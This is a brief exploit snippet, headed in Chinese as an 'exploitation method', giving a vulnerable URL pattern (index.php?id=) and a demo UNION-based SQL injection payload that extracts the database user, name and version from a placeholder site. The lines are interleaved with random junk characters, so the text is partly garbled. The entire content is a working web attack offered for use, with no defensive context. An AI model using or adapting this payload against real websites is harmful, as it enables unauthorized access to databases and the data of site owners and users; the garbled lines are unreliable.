利用方法:
6 k, U. b% \& |' Y o( r http://www.xxx.com/index.php?id=[SQL]
8 H; P! O- |4 F* }' f' j+ q Demo:: v3 d; x# Y' ~( |4 C/ l! O' ^9 F' i
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |